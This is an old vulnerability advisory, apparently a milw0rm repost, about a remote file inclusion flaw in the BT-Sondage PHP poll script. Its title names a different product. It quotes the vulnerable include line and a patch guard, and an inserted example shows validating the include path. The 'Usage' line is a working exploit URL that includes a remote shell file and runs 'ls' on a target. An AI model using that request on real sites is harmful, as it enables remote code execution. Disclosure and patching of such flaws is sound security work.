Securityvulns SECURITYVULNS:DOC:16594
Apr 05, 2007 - 12:00 a.m.

CWB PRO Version 1.5 (INCLUDE_PATH) Remote File Include Vulnerabilities

Title : BT-Sondage-v112 Remote File Include Vulnerability


#Author: Crackers_Child

#cont@ct: [email protected]


Affected software description :

Application : BT-Sondage
URL : http://www.phpscripts-fr.net/scripts/download.php?id=1575


dork : Download Script :)
Exploit :


Vulnerable code in gestion_sondage.php

include($repertoire_visiteur.'utilitaires/affichage_formulaire.php');

To patch it, add

if ( !defined( "_GESTION_SONDAGE_PHP" ) )
{
    die( "Direct access not permitted" ); // stop when the file is requested directly
}
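
The guard above blocks direct requests to gestion_sondage.php only when the script that legitimately includes it defines _GESTION_SONDAGE_PHP first, and the include prefix itself should never be taken from request data. The following is an added example (not BT-Sondage code and not from the advisory's author) that validates the prefix before the include; resolve_visitor_dir(), the directory name visiteur and the temporary demo tree are assumptions made for the demonstration.

```php
<?php
// Added example, not BT-Sondage code. resolve_visitor_dir() is a hypothetical helper.

/**
 * Return the include prefix for the visitor directory, or null if the
 * configured value is not a local directory inside $installRoot.
 */
function resolve_visitor_dir(string $installRoot, string $configured): ?string
{
    // A scheme prefix (http://, ftp://, php://, data:) is never a local directory.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $configured)) {
        return null;
    }
    $root = realpath($installRoot);
    $dir  = realpath($installRoot . '/' . $configured);
    if ($root === false || $dir === false || !is_dir($dir)) {
        return null;
    }
    // After symlink and ../ resolution the directory must still be under the root.
    if ($dir !== $root && strpos($dir . '/', $root . '/') !== 0) {
        return null;
    }
    return $dir . '/';
}

// Constructed install tree so the example runs offline.
$root = sys_get_temp_dir() . '/sondage_demo_' . getmypid();
mkdir($root . '/visiteur/utilitaires', 0700, true);
file_put_contents(
    $root . '/visiteur/utilitaires/affichage_formulaire.php',
    '<?php echo "formulaire\n";'
);

// Constructed inputs: one legitimate config value, two that must be refused.
foreach (['visiteur', 'http://example.invalid/x.txt?', '../..'] as $value) {
    $prefix = resolve_visitor_dir($root, $value);
    if ($prefix === null) {
        echo "refused: $value\n";
        continue;
    }
    echo "including from: $prefix\n";
    include $prefix . 'utilitaires/affichage_formulaire.php';
}
```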


Usage:

http://[target]/[sondage_path]/utilitaires/gestion_sondage.php?repertoire_visiteur=Shell.txt?&cmd=ls


greets: EveryBody :=)


Note : An angel on one side, the devil on the other, my head is a dungeon. Help me, my God, help :(


milw0rm.com [2007-04-01]